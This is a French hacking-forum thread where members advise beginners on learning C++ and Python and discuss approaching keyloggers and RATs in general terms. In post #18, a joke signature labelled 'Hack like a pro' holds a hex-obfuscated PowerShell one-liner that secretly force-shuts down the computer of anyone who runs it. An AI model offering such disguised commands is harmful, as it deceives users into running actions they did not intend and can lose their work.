Annonce

Réduire
Aucune annonce.

Acloseone

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • #16
    Bonsoir,

    Oui, j'ai commencé à y jeter un oeil sur ce forum, que se soit sur les cours en C/C++ ou python, et c'est vraiment très bien fait. Il y a clairement du boulot, félicitations !
    Dernière modification par acloseone, 09 décembre 2018, 14h05.

    Commentaire


    • #17
      Partir d'un projet c'est bien, mais il doit être à la mesure de tes compétences intellectuelles, et suffisamment simple pour ne pas avoir trop de notions à apprendre d'un seul trait.

      Un langage de programmation s'apprend comme une langue étrangère, tu peux déjà en apprendre du vocabulaire et faire des tests rapides pour en voir les résultats. Dès que tu commenceras à être plus à l'aise, l'idée de partir d'un mini projet sera bonne, mais sans ses petites notions testées, tu risques de te faire peur et te décourager.

      Commentaire


      • #18
        Envoyé par fred Voir le message
        à la mesure de tes compétences intellectuelles, et suffisamment simple
        POPOPOOOOOO LE CLAAAASSHHH !!!




        Ca va j'décooonne ...

        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #19
          Oui, cette maladresse m'a fait sourire aussi.
          Dernière modification par acloseone, 09 décembre 2018, 14h05.

          Commentaire


          • #20
            Ce n'est pas une maladresse, mais je veux bien m'expliquer

            Beaucoup de débutants souhaitent créer des jeux 3D dans un langage alors qu'ils n'ont pas les compétences mathématiques nécessaires pour le faire. J'indique juste ici qu'avant de se lancer dans l'écriture d'un code pour un projet compliqué, il faut déjà se renseigner sur la théorie à maîtriser, évitant ainsi des surprises en cours de route.

            On me donne l'exemple d'un RAT, d'un firewall, seulement en comprendre le fonctionnement ne sera pas suffisant... il faudra des notions importantes en réseau, les normes, etc. Bref tout cet aspect théorique peut bloquer et donc faire réfléchir à un autre projet. Mais si ces notions ne bloquent pas, alors lance toi, je serais le premier à t'aider dans le langage choisi à partir du moment où tu sais ce tu veux et que tu as compris la théorie suffisamment pour l'expliquer lors de ton problème de syntaxe.

            J'espère que vous m'avez mieux compris, même si je pense que cette explication n'était pas utile et que vous aviez bien compris le sens de ma réponse précédente.

            Commentaire


            • #21
              Effectivement, je comprends bien, et je t'en remercie. Le souci, c'est que je ne sais pas ce que je sais. J'en sais et j'en sais moins, mais je ne sais pas à quel point, donc ce ne sera qu'en me confrontant que je pourrais mieux apprécier mes lacunes et mes connaissances.
              Dernière modification par acloseone, 09 décembre 2018, 14h05.

              Commentaire


              • #22
                Envoyé par acloseone Voir le message
                Effectivement, je comprends bien, et je t'en remercie. Le souci, c'est que je ne sais pas ce que je sais. J'en sais et j'en sais moins, mais je ne sais pas à quel point, donc ce ne sera qu'en me confrontant que je pourrais mieux apprécier mes lacunes et mes connaissances.

                Là, j'ai jeté un oeil sur 2 keyloggers en C++, un pour Linux, un pour Windows, ainsi qu'un RAT rudimentaire en python... effectivement, il y a tout un environnement à voir car même si j'entends bien que quoi qu'il en soit, les articulations restent logiques, il faut tout de même savoir pondre les fonctions qui font bien ce qu'on leur demande et savoir pourquoi et comment elles le font... et ça, ça ne s'invente pas.

                Mais pour ça, j'ai relativement confiance en mes capacités d'adaptation si je suis motivé. Donc si je trouve la motivation dans ce cagniard, je sais que ça va passer "easy" (quand je dis "easy", je ne dis pas sans effort, je dis que les efforts, on ne les sent pas passer). Mais là, tout de suite, avec ces chaleurs, je crains que le temps soit plus aux apéros qu'à la concentration derrière son ordinateur... quand bien même ce serait nuit-banche-café-clope !
                Pour ma part j'ai envie de m'engager à apprendre des langages depuis quelques mois mais je ne trouve toujours pas la motivation et encore moins en vacances.
                J'ai appris les langages on va dire universelle tels que le HTML, CSS mais qui ne m'apportent pas grand chose et encore moins une idée de choses à réaliser.
                Je pense commencer sur du Python..

                Commentaire


                • #23
                  Le temps est plus à l'apéro en effet.

                  @ acloseone : au niveau des keyloggers, je ne te conseille pas de commencer par là. Il faut d'abord se faire la main avec les notions de base du langage C++. Ensuite, aborder tranquillement un par un les domaines utiles à commencer par les API du système concerné. Ce n'est qu'après cela que tu peux aller au cœur du sujet (linux -> évènements X et Windows -> hooks, dll).

                  @ Freysheur : c'est effectivement le nerf de la guerre : trouver un sujet, ni trop ambitieux, ni inintéressant. Python, de ce que je peux en comprendre, est un des meilleurs langages pour réaliser des exploits ; c'est-à-dire sans se prendre la tête avec le langage lui-même, juste avec la faille à exploiter. Mais il existe aussi une multitude de logiciels très variés écrits avec Pyrhon. Il m'a l'air très versatile et le seul défaut que je peux y voir est que cette facilité de codage se paie en méconnaissance des éléments de bas niveau de programmation (mémoire, codage des variables, code machine).

                  Lorsque je me suis mis à C++, j'avais un background en BASIC et quelque peu en assembleur Z80. Pour ce faire, j'ai acheté C++ Builder de Borland. Mon premier programme fut la réalisation d'une calculatrice analogue à celle de Windows. Je l'ai fait sans vraiment comprendre le C++ mais l'éditeur d'interface Wysig était et est toujours un pur bonheur. Je me souviens que je ne comprenais même pas l'aide car je n'avais pas l'habitude des prototypes de fonctions en C++ (rien de tel en BASIC). Et... J'ai fait un autre logiciel puis un autre et peu à peu (grâce aux gens présents sur les forums Borland, il faut le dire), j'ai fini par apprendre bien des choses.

                  Bref, quand on débute il faut s'accrocher, se donner des buts et ne pas hésiter à demander de l'aide, ici ou ailleurs.
                  Dernière modification par Icarus, 02 août 2018, 18h33.

                  Commentaire


                  • #24
                    BASIC ?

                    10 goto 20
                    20 goto 40 ?

                    Dernière modification par acloseone, 09 décembre 2018, 14h06.

                    Commentaire


                    • #25
                      Merci Icarus d'avoir prit le temps de me répondre, oui c'est vrai tu as entièrement raison mais mon problème c'est que je n'ai pas trop de but avec le Python..
                      Je suis sous Linux pour commencer, je ne sais pas quoi et par où commencer car recopier des scripts ne m'aideront pas trop surtout que je n'ai pas d'idée en tête.
                      En ce moment je prends l'habitude de me coucher plus tôt et de me lever plus tôt, histoire d'avoir plus de réflexions, plus d'imaginations et avoir un sommeil réparateur.
                      C'est déjà un bon point de départ pour développer, non ?

                      Un peu plus d'un an que je traîne ici en tant que membre, environ 4 ans que je regarde le hacking en général mais sans vraiment apprendre et expérimenter..
                      J'aurai aimer apprendre et comprendre le fonctionnement du hacking ainsi que l'idéologie même que j'ai déjà une idée dessus.. Je souhaite savoir comment certaines personnes font leurs propres scripts pour des RAT etc et le fonctionnement. Merci d'avance si je peux avoir des réponses
                      ( j'ai une base assez solide en réseaux)
                      Dernière modification par Freysheur, 02 août 2018, 21h29. Motif: rajout de ce que j'ai acquis et de ce que je souhaites acquérir

                      Commentaire


                      • #26
                        Mon point de vue purement personnel (qui n'engage donc que moi. Je me dégage donc de toutes utilisations frauduleuses de mes propos !) :

                        Je n'arrive pas non plus à ingurgiter des tutos ou du code sans projet ou sans objectif, juste pour apprendre le hacking.
                        Dernière modification par acloseone, 09 décembre 2018, 14h06.

                        Commentaire

                        Chargement...
                        X